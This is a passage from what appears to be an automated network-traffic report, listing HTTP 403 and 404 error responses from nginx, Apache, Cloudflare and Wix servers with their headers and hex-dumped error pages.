3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DUgqRTdbAtASoEVLyXsdIJGiPMeNzbt%2B1ZFO%2F7noS2uISZ65g1dPTac6QkehdknEGyeh30nFZbWEFTdd6Fg3xTxZzA5Ly0neXlNY9b2341vMrhRFyFW2Mhg2e%2Blaezt2cH4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6a0ad1d35f6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-siz
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:50 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:50 GMTServer: Apache/2.4.54 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FDAfEADuVJ3IRcQzEpGrEk5R6RIAV0Slxp4qp%2Bg5foAQ544Tq30NXt0MlaAGPDpZoy0jVdKFNQxzyzhDL9qdX1IxUCjxXF%2FklOuul2eGer7JjELofIBudE35MySbotc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6e00f2169a3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:43:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1XlJloGuCBRYvAMcYW%2FgqPp5tVc4u%2BiBvwMNodXYq8Wv4B5FKoOAFtoZ2LDsKUvKR2f7QmRCkaLi7iAWsJoFA92VxvmiO2FU%2FjEmqGeYPbSnAhP8gvgQBsMXtPeBb7w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6e03f5569a3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 22 Mar 2023 04:44:00 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:01 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcfX4HJto+QUpjFQhXwjCys,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1679460241.54823700984116207X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:01 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E9qI3t%2BJ%2BMuoxdX8y9KMdDvwhYOjw7GSv4CUdLBz%2BpcOkpEbg5BWRtzD2Bx0mVZ2kyxV5WoF4Y7t23WzX77n8vozPnQty3QJP7RWgbdGQ1l8EJkRP1EFgic%2FttauVkOZ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6ee7d732c5d-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Mar 2023 04:44:01 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:01 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xp7Y%2FiwCqSOM9orDnRmSE3RzmqV1DKueYgZcSj402Bby6GEXOO%2FHD3r%2BmxydH%2BAb9FMOX99%2B7sc2ZTV8Sf59VP2zvn4V1C9i6uDk7cJW8bikDCKpSX4zBW%2BQWgphaOCW"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7abbc6ef9e882c5d-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 22 Mar 2023 04:44:03 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
